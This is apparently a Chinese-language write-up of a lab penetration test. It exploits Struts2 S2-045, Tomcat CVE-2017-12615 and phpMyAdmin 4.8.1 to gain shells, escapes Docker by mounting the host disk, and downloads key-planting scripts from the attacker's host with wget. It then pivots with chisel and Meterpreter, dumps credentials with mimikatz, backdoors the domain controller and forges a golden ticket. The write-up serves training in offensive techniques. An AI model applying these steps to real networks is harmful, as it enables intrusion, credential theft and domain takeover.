进入Ubuntu的web虚拟机,ubuntu为我们的web环境,其中的web环境需要手动开启,全部为docker环境,需要启动的环境分别为:s2-045、CVE-2017-12615、cve-2018-12613,启动方法如下:
sudo su
ubuntu
docker-compose build
docker-compose up
环境全部开启效果如下:
通过nmap发现主机开启以下服务
端口2001是考察的str2的框架漏洞,使用工具进行验证并上传shell进行连接。
端口2002是Tomcat/8.5.19是CVE-2017-12615,使用PUT方法进行上传文件,然后连接shell。
端口2003是phpmyadmin版本号是4.8.1,存在任意文件包含漏洞
三个端口的漏洞都利用完毕,下步拿下域内pc以及域控,使用ssh密钥进行docker逃逸。
利用kali的searchsploit搜索Tomcat的poc,新建一个文件夹key,将poc复制到keys下,进行验证并上传shell
找到对应的版本漏洞
将poc复制到key文件下,使用python进行验证
然后访问pwn.jsp
使用密钥建立用户然后docker逃逸
ls /dev
mkdir /test
mount /dev/sda1 /test
ls -alh /test
ls -alh /test/home/ubuntu/.ssh/
在当前目录下生成一个密钥,然后创建一个命令执行脚本
复制test.pub的内容到key.sh里
使用python开启web服务器,然后用wget进行下载key.sh
赋予key.sh权限,执行以后查看.ssh目录是否写入了authorized_keys
chmod 777 key.sh
./key.sh
ls -alh /test/home/ubuntu/.ssh
使用密钥查看是否能登录机器
再写一个命令脚本进行创建文件并输出密钥
查看本机kali的密码
cat /etc/shadow
查看sudoers
写好以后,使用wget进行下载
chmod 777 add.sh
./add.sh
写入成功
本地文件夹一共有以下文件,现在进行登录服务器,断网了重启了一下ip变了~~
到这docker就逃逸成功了,下面进行内网渗透
下载chisel
在Ubuntu里使用wget 下载chisel,然后开启服务端
./chisel_1.7.3_linux_amd64 server -p 4545 --sockc5
./chisel_1.7.3_linux_amd64 client 192.168.157.131:4545 socks
进入msfconsole
成功打入,进行域内信息搜集
获取域内信息
Domain Computers:
\TESTWIN7-PC
\WIN-ENS2VR5TR3N
切换到user权限
Domain controllers:
WIN-ENS2VR5TR3N
域名:demo.com
域管账户:Administrator
获取域内用户
寻找域控ip:192.168.183.130
获取sid
user uid:
S-1-5-21-979886063-1111900045-1414766810-1107
domain uid:
S-1-5-21-979886063-1111900045-1414766810
返回meterpreter,回到system权限使用mimikatz抓取密码
进入到shell,桌面有工具利用ms14-068
使用命令关闭防火墙
生成一个exe的后门,并上传至根目录
将win7的update.exe复制到域控机器
创建服务成功,开启防火墙,运行update,设置监听
设置msf的监听
成功拿到meterpreter
将权限变为administrator,然后加载kiwi,获取NTLM Hash
回到win7的session,将票据给清空,再生产黄金票据。
写的比较杂乱,大佬勿喷,有什么问题请留言!